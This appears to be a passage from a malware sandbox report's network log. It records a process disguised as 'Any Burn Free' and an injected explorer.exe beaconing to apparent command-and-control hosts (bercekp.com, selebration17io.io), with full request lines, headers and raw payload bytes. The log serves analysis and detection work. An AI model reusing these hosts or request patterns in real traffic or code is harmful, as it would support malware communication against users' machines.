                                                                                                                                                                    Feb 8, 2024 19:10:44.737291098 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:44.973692894 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:44 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    95192.168.2.349858185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:45.481997967 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:45.718525887 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:45 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    96192.168.2.349859185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:46.154385090 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:46.390821934 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:46 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    97192.168.2.349860185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:46.805747986 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:47.042608023 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:46 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    98192.168.2.349861185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:48.884692907 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:49.122040987 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:49 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    99192.168.2.349862185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:49.598680973 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:49.835277081 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:49 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    100192.168.2.349866185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:50.224246025 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:50.460764885 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:50 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    101192.168.2.349868185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:50.906769037 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:51.143182039 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:51 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    102192.168.2.349870185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:51.842910051 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:52.079415083 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:51 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    103192.168.2.349871185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:52.486432076 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:52.723294020 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:52 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    104192.168.2.349873185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:53.297040939 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:53.533221006 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:53 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    105192.168.2.349876185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:54.023137093 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:54.259263992 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:54 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    106192.168.2.349877185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:54.655613899 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:54.892462015 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:54 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    107192.168.2.349879185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:55.380724907 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:55.617584944 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    108192.168.2.34988091.215.85.12080640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:55.520817995 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://yrpbieiomege.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 322
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Feb 8, 2024 19:10:55.520859957 CET322OUTData Raw: 48 9d 8b cb 3a 64 54 50 59 06 21 52 08 a1 5f bb 2f 69 ed 1b 8e 1f d7 aa b3 1c d2 84 70 ff d7 e4 89 af 81 be 74 36 95 c7 a2 5a 6a 7c 8d 96 fd 1b f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9b ff 5b e8
                                                                                                                                                                    Data Ascii: H:dTPY!R_/ipt6Zj|_=;}f=B!bO[t|'\1x?\_[1f2r^e"q7Ofa3td^Qa9S_p?[Nm*!'Yj!GREIV#';jtJ1{eD=)X?
                                                                                                                                                                    Feb 8, 2024 19:10:55.777405977 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:55 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 7=[0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    109192.168.2.349881185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:56.012806892 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:56.249639034 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:56 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    110192.168.2.349882185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:56.644092083 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:56.880717039 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:56 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    111192.168.2.349883185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:58.090631008 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:58.327440023 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    112192.168.2.349887185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:58.726861000 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:58.963484049 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:58 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    113192.168.2.349889185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:59.831568956 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:00.068303108 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:59 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    114192.168.2.349891185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:11:00.782175064 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:11:01.018646955 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:11:00 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
